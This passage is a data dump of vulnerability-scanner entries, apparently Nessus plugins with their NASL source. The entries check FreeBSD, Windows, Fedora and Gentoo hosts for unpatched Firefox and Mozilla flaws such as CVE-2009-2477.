reference:\"mozvoikko-0.9.7-0.5.rc1.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc11.3\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"ruby-gnome2-0.19.0-3.fc11.1\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"xulrunner-1.9.1.1-1.fc11\")) flag++;\nif 
(rpm_check(release:\"FC11\", reference:\"yelp-2.26.0-5.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Miro / blam / chmsee / eclipse / epiphany / epiphany-extensions / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:43", "description": "Mozilla Project reports :\n\nFirefox user zbyte reported a crash that we determined could result in\nan exploitable memory corruption problem. In certain cases after a\nreturn from a native function, such as escape(), the Just-in-Time\n(JIT) compiler could get into a corrupt state. This could be exploited\nby an attacker to run arbitrary code such as installing malware.\n\nThis vulnerability does not affect earlier versions of Firefox which\ndo not support the JIT feature.", "edition": 27, "published": "2009-07-20T00:00:00", "title": "FreeBSD : mozilla -- corrupt JIT state after deep return from native function (c1ef9b33-72a6-11de-82ea-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:firefox"], "id": "FREEBSD_PKG_C1EF9B3372A611DE82EA0030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/39867", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39867);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2477\");\n script_xref(name:\"CERT\", value:\"443060\");\n\n script_name(english:\"FreeBSD : mozilla -- corrupt JIT state after deep return from native function (c1ef9b33-72a6-11de-82ea-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Mozilla Project reports :\n\nFirefox user zbyte reported a crash that we determined could result in\nan exploitable memory corruption problem. In certain cases after a\nreturn from a native function, such as escape(), the Just-in-Time\n(JIT) compiler could get into a corrupt state. This could be exploited\nby an attacker to run arbitrary code such as installing malware.\n\nThis vulnerability does not affect earlier versions of Firefox which\ndo not support the JIT feature.\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-41/\"\n );\n # https://vuxml.freebsd.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f8822c7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox>=3.5.*,1<3.5.1,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:07:46", "description": "Firefox 3.5 is installed on the remote host. This version is\npotentially affected by multiple flaws :\n\n - It may be possible to crash the browser or potentially\n execute arbitrary code by using a flash object that\n presents a slow script dialog. (MFSA 2009-35)\n\n - In certain cases after a return from a native function,\n such as escape(), the Just-in-Time (JIT) compiler could\n get into a corrupt state. 
An attacker who is able to\n trick a user of the affected software into visiting a\n malicious link may be able to leverage this issue to\n run arbitrary code subject to the user's privileges.\n (MFSA 2009-41)", "edition": 30, "published": "2009-07-17T00:00:00", "title": "Firefox 3.5.x < 3.5.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2467"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_351.NASL", "href": "https://www.tenable.com/plugins/nessus/39853", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39853);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2009-2467\", \"CVE-2009-2477\");\n script_bugtraq_id(35660,35767);\n\n script_name(english:\"Firefox 3.5.x < 3.5.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Firefox\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is \naffected by multiple flaws.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"Firefox 3.5 is installed on the remote host. This version is\npotentially affected by multiple flaws :\n\n - It may be possible to crash the browser or potentially\n execute arbitrary code by using a flash object that\n presents a slow script dialog. (MFSA 2009-35)\n\n - In certain cases after a return from a native function,\n such as escape(), the Just-in-Time (JIT) compiler could\n get into a corrupt state. 
An attacker who is able to\n trick a user of the affected software into visiting a\n malicious link may be able to leverage this issue to\n run arbitrary code subject to the user's privileges.\n (MFSA 2009-41)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-35/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-41/\" );\n script_set_attribute(attribute:\"solution\", value: \"Upgrade to Firefox 3.5.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 
2009-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\"); \n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'3.5.1', min:'3.5', severity:SECURITY_HOLE);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:54:31", "description": "The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. 
Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-08T00:00:00", "title": "GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)", "type": "nessus", "bulletinFamily": "scanner", "modified": "2013-01-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:seamonkey-bin", "p-cpe:/a:gentoo:linux:firefox", "p-cpe:/a:gentoo:linux:mozilla-firefox-bin", "p-cpe:/a:gentoo:linux:thunderbird", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin", "p-cpe:/a:gentoo:linux:seamonkey", "p-cpe:/a:gentoo:linux:icecat", "p-cpe:/a:gentoo:linux:mozilla-firefox", "p-cpe:/a:gentoo:linux:nss", "p-cpe:/a:gentoo:linux:xulrunner", "p-cpe:/a:gentoo:linux:thunderbird-bin", 
"p-cpe:/a:gentoo:linux:xulrunner-bin", "p-cpe:/a:gentoo:linux:firefox-bin", "p-cpe:/a:gentoo:linux:mozilla-thunderbird"], "id": "GENTOO_GLSA-201301-01.NASL", "href": "https://www.tenable.com/plugins/nessus/63402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201301-01.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63402);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-1861\", \"CVE-2007-2437\", \"CVE-2007-2671\", \"CVE-2007-3073\", \"CVE-2008-0016\", \"CVE-2008-0017\", \"CVE-2008-0367\", \"CVE-2008-3835\", \"CVE-2008-3836\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4063\", \"CVE-2008-4064\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-4070\", \"CVE-2008-4582\", \"CVE-2008-5012\", \"CVE-2008-5013\", \"CVE-2008-5014\", \"CVE-2008-5015\", \"CVE-2008-5016\", \"CVE-2008-5017\", \"CVE-2008-5018\", \"CVE-2008-5019\", \"CVE-2008-5021\", \"CVE-2008-5022\", \"CVE-2008-5023\", \"CVE-2008-5024\", \"CVE-2008-5052\", \"CVE-2008-5500\", \"CVE-2008-5501\", \"CVE-2008-5502\", \"CVE-2008-5503\", \"CVE-2008-5504\", \"CVE-2008-5505\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5510\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5513\", \"CVE-2008-5822\", \"CVE-2008-5913\", \"CVE-2008-6961\", \"CVE-2009-0071\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", 
\"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0652\", \"CVE-2009-0689\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0775\", \"CVE-2009-0776\", \"CVE-2009-0777\", \"CVE-2009-1044\", \"CVE-2009-1169\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\", \"CVE-2009-1313\", \"CVE-2009-1392\", \"CVE-2009-1571\", \"CVE-2009-1828\", \"CVE-2009-1832\", \"CVE-2009-1833\", \"CVE-2009-1834\", \"CVE-2009-1835\", \"CVE-2009-1836\", \"CVE-2009-1837\", \"CVE-2009-1838\", \"CVE-2009-1839\", \"CVE-2009-1840\", \"CVE-2009-1841\", \"CVE-2009-2043\", \"CVE-2009-2044\", \"CVE-2009-2061\", \"CVE-2009-2065\", \"CVE-2009-2210\", \"CVE-2009-2404\", \"CVE-2009-2408\", \"CVE-2009-2462\", \"CVE-2009-2463\", \"CVE-2009-2464\", \"CVE-2009-2465\", \"CVE-2009-2466\", \"CVE-2009-2467\", \"CVE-2009-2469\", \"CVE-2009-2470\", \"CVE-2009-2471\", \"CVE-2009-2472\", \"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\", \"CVE-2009-2535\", \"CVE-2009-2654\", \"CVE-2009-2662\", \"CVE-2009-2664\", \"CVE-2009-2665\", \"CVE-2009-3069\", \"CVE-2009-3070\", \"CVE-2009-3071\", \"CVE-2009-3072\", \"CVE-2009-3074\", \"CVE-2009-3075\", \"CVE-2009-3076\", \"CVE-2009-3077\", \"CVE-2009-3078\", \"CVE-2009-3079\", \"CVE-2009-3274\", \"CVE-2009-3371\", \"CVE-2009-3372\", \"CVE-2009-3373\", \"CVE-2009-3374\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3377\", \"CVE-2009-3378\", \"CVE-2009-3379\", \"CVE-2009-3380\", \"CVE-2009-3381\", \"CVE-2009-3382\", \"CVE-2009-3383\", \"CVE-2009-3388\", \"CVE-2009-3389\", \"CVE-2009-3555\", \"CVE-2009-3978\", \"CVE-2009-3979\", \"CVE-2009-3980\", \"CVE-2009-3981\", \"CVE-2009-3982\", \"CVE-2009-3983\", \"CVE-2009-3984\", \"CVE-2009-3985\", \"CVE-2009-3986\", \"CVE-2009-3987\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\", \"CVE-2010-0163\", 
\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0166\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0169\", \"CVE-2010-0170\", \"CVE-2010-0171\", \"CVE-2010-0172\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-0220\", \"CVE-2010-0648\", \"CVE-2010-0654\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-1205\", \"CVE-2010-1206\", \"CVE-2010-1207\", \"CVE-2010-1208\", \"CVE-2010-1209\", \"CVE-2010-1210\", \"CVE-2010-1211\", \"CVE-2010-1212\", \"CVE-2010-1213\", \"CVE-2010-1214\", \"CVE-2010-1215\", \"CVE-2010-1585\", \"CVE-2010-2751\", \"CVE-2010-2752\", \"CVE-2010-2753\", \"CVE-2010-2754\", \"CVE-2010-2755\", \"CVE-2010-2760\", \"CVE-2010-2762\", \"CVE-2010-2763\", \"CVE-2010-2764\", \"CVE-2010-2765\", \"CVE-2010-2766\", \"CVE-2010-2767\", \"CVE-2010-2768\", \"CVE-2010-2769\", \"CVE-2010-2770\", \"CVE-2010-3131\", \"CVE-2010-3166\", \"CVE-2010-3167\", \"CVE-2010-3168\", \"CVE-2010-3169\", \"CVE-2010-3170\", \"CVE-2010-3171\", \"CVE-2010-3173\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3399\", \"CVE-2010-3400\", \"CVE-2010-3765\", \"CVE-2010-3766\", \"CVE-2010-3767\", \"CVE-2010-3768\", \"CVE-2010-3769\", \"CVE-2010-3770\", \"CVE-2010-3771\", \"CVE-2010-3772\", \"CVE-2010-3773\", \"CVE-2010-3774\", \"CVE-2010-3775\", \"CVE-2010-3776\", \"CVE-2010-3777\", \"CVE-2010-3778\", \"CVE-2010-4508\", \"CVE-2010-5074\", \"CVE-2011-0051\", \"CVE-2011-0053\", \"CVE-2011-0054\", \"CVE-2011-0055\", \"CVE-2011-0056\", \"CVE-2011-0057\", \"CVE-2011-0058\", \"CVE-2011-0059\", \"CVE-2011-0061\", \"CVE-2011-0062\", 
\"CVE-2011-0065\", \"CVE-2011-0066\", \"CVE-2011-0067\", \"CVE-2011-0068\", \"CVE-2011-0069\", \"CVE-2011-0070\", \"CVE-2011-0071\", \"CVE-2011-0072\", \"CVE-2011-0073\", \"CVE-2011-0074\", \"CVE-2011-0075\", \"CVE-2011-0076\", \"CVE-2011-0077\", \"CVE-2011-0078\", \"CVE-2011-0079\", \"CVE-2011-0080\", \"CVE-2011-0081\", \"CVE-2011-0082\", \"CVE-2011-0083\", \"CVE-2011-0084\", \"CVE-2011-0085\", \"CVE-2011-1187\", \"CVE-2011-1202\", \"CVE-2011-1712\", \"CVE-2011-2362\", \"CVE-2011-2363\", \"CVE-2011-2364\", \"CVE-2011-2365\", \"CVE-2011-2369\", \"CVE-2011-2370\", \"CVE-2011-2371\", \"CVE-2011-2372\", \"CVE-2011-2373\", \"CVE-2011-2374\", \"CVE-2011-2375\", \"CVE-2011-2376\", \"CVE-2011-2377\", \"CVE-2011-2378\", \"CVE-2011-2605\", \"CVE-2011-2980\", \"CVE-2011-2981\", \"CVE-2011-2982\", \"CVE-2011-2983\", \"CVE-2011-2984\", \"CVE-2011-2985\", \"CVE-2011-2986\", \"CVE-2011-2987\", \"CVE-2011-2988\", \"CVE-2011-2989\", \"CVE-2011-2990\", \"CVE-2011-2991\", \"CVE-2011-2993\", \"CVE-2011-2995\", \"CVE-2011-2996\", \"CVE-2011-2997\", \"CVE-2011-2998\", \"CVE-2011-2999\", \"CVE-2011-3000\", \"CVE-2011-3001\", \"CVE-2011-3002\", \"CVE-2011-3003\", \"CVE-2011-3004\", \"CVE-2011-3005\", \"CVE-2011-3026\", \"CVE-2011-3062\", \"CVE-2011-3101\", \"CVE-2011-3232\", \"CVE-2011-3389\", \"CVE-2011-3640\", \"CVE-2011-3647\", \"CVE-2011-3648\", \"CVE-2011-3649\", \"CVE-2011-3650\", \"CVE-2011-3651\", \"CVE-2011-3652\", \"CVE-2011-3653\", \"CVE-2011-3654\", \"CVE-2011-3655\", \"CVE-2011-3658\", \"CVE-2011-3659\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\", \"CVE-2011-3670\", \"CVE-2011-3866\", \"CVE-2011-4688\", \"CVE-2012-0441\", \"CVE-2012-0442\", \"CVE-2012-0443\", \"CVE-2012-0444\", \"CVE-2012-0445\", \"CVE-2012-0446\", \"CVE-2012-0447\", \"CVE-2012-0449\", \"CVE-2012-0450\", \"CVE-2012-0451\", \"CVE-2012-0452\", \"CVE-2012-0455\", \"CVE-2012-0456\", \"CVE-2012-0457\", \"CVE-2012-0458\", \"CVE-2012-0459\", \"CVE-2012-0460\", \"CVE-2012-0461\", 
\"CVE-2012-0462\", \"CVE-2012-0463\", \"CVE-2012-0464\", \"CVE-2012-0467\", \"CVE-2012-0468\", \"CVE-2012-0469\", \"CVE-2012-0470\", \"CVE-2012-0471\", \"CVE-2012-0473\", \"CVE-2012-0474\", \"CVE-2012-0475\", \"CVE-2012-0477\", \"CVE-2012-0478\", \"CVE-2012-0479\", \"CVE-2012-1937\", \"CVE-2012-1938\", \"CVE-2012-1939\", \"CVE-2012-1940\", \"CVE-2012-1941\", \"CVE-2012-1945\", \"CVE-2012-1946\", \"CVE-2012-1947\", \"CVE-2012-1948\", \"CVE-2012-1949\", \"CVE-2012-1950\", \"CVE-2012-1951\", \"CVE-2012-1952\", \"CVE-2012-1953\", \"CVE-2012-1954\", \"CVE-2012-1955\", \"CVE-2012-1956\", \"CVE-2012-1957\", \"CVE-2012-1958\", \"CVE-2012-1959\", \"CVE-2012-1960\", \"CVE-2012-1961\", \"CVE-2012-1962\", \"CVE-2012-1963\", \"CVE-2012-1964\", \"CVE-2012-1965\", \"CVE-2012-1966\", \"CVE-2012-1967\", \"CVE-2012-1970\", \"CVE-2012-1971\", \"CVE-2012-1972\", \"CVE-2012-1973\", \"CVE-2012-1974\", \"CVE-2012-1975\", \"CVE-2012-1976\", \"CVE-2012-1994\", \"CVE-2012-3956\", \"CVE-2012-3957\", \"CVE-2012-3958\", \"CVE-2012-3959\", \"CVE-2012-3960\", \"CVE-2012-3961\", \"CVE-2012-3962\", \"CVE-2012-3963\", \"CVE-2012-3964\", \"CVE-2012-3965\", \"CVE-2012-3966\", \"CVE-2012-3967\", \"CVE-2012-3968\", \"CVE-2012-3969\", \"CVE-2012-3970\", \"CVE-2012-3971\", \"CVE-2012-3972\", \"CVE-2012-3973\", \"CVE-2012-3975\", \"CVE-2012-3976\", \"CVE-2012-3978\", \"CVE-2012-3980\", \"CVE-2012-3982\", \"CVE-2012-3984\", \"CVE-2012-3985\", \"CVE-2012-3986\", \"CVE-2012-3988\", \"CVE-2012-3989\", \"CVE-2012-3990\", \"CVE-2012-3991\", \"CVE-2012-3992\", \"CVE-2012-3993\", \"CVE-2012-3994\", \"CVE-2012-3995\", \"CVE-2012-4179\", \"CVE-2012-4180\", \"CVE-2012-4181\", \"CVE-2012-4182\", \"CVE-2012-4183\", \"CVE-2012-4184\", \"CVE-2012-4185\", \"CVE-2012-4186\", \"CVE-2012-4187\", \"CVE-2012-4188\", \"CVE-2012-4190\", \"CVE-2012-4191\", \"CVE-2012-4192\", \"CVE-2012-4193\", \"CVE-2012-4194\", \"CVE-2012-4195\", \"CVE-2012-4196\", \"CVE-2012-4201\", \"CVE-2012-4202\", \"CVE-2012-4204\", \"CVE-2012-4205\", 
\"CVE-2012-4206\", \"CVE-2012-4207\", \"CVE-2012-4208\", \"CVE-2012-4209\", \"CVE-2012-4210\", \"CVE-2012-4212\", \"CVE-2012-4215\", \"CVE-2012-4216\", \"CVE-2012-4930\", \"CVE-2012-5354\", \"CVE-2012-5829\", \"CVE-2012-5830\", \"CVE-2012-5833\", \"CVE-2012-5835\", \"CVE-2012-5836\", \"CVE-2012-5838\", \"CVE-2012-5839\", \"CVE-2012-5840\", \"CVE-2012-5841\", \"CVE-2012-5842\", \"CVE-2012-5843\");\n script_bugtraq_id(51752, 51753, 51754, 51756, 51757, 51765, 51787, 51975, 52456, 52457, 52458, 52459, 52460, 52461, 52463, 52464, 52465, 52466, 52467, 53219, 53220, 53221, 53223, 53224, 53225, 53227, 53228, 53229, 53230, 53231, 53315, 53791, 53792, 53793, 53794, 53796, 53797, 53798, 53799, 53800, 54572, 54573, 54574, 54575, 54576, 54577, 54578, 54579, 54580, 54581, 54582, 54583, 54584, 54585, 54586, 55257, 55260, 55264, 55266, 55274, 55276, 55277, 55278, 55292, 55304, 55306, 55308, 55310, 55311, 55313, 55314, 55316, 55317, 55318, 55319, 55320, 55321, 55322, 55323, 55324, 55325, 55340, 55342, 55857, 55922, 55924, 55926, 55927, 55930, 55931, 55932, 56118, 56119, 56120, 56121, 56123, 56125, 56126, 56127, 56128, 56129, 56130, 56131, 56135, 56136, 56140, 56151, 56153, 56154, 56155, 56301, 56302, 56306, 56611, 56612, 56613, 56614, 56616, 56618, 56621, 56625, 56627, 56629, 56630, 56631, 56632, 56633, 56634, 56635, 56636, 56637, 56641, 56642, 56643, 56644, 56646);\n script_xref(name:\"GLSA\", value:\"201301-01\");\n\n script_name(english:\"GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla 
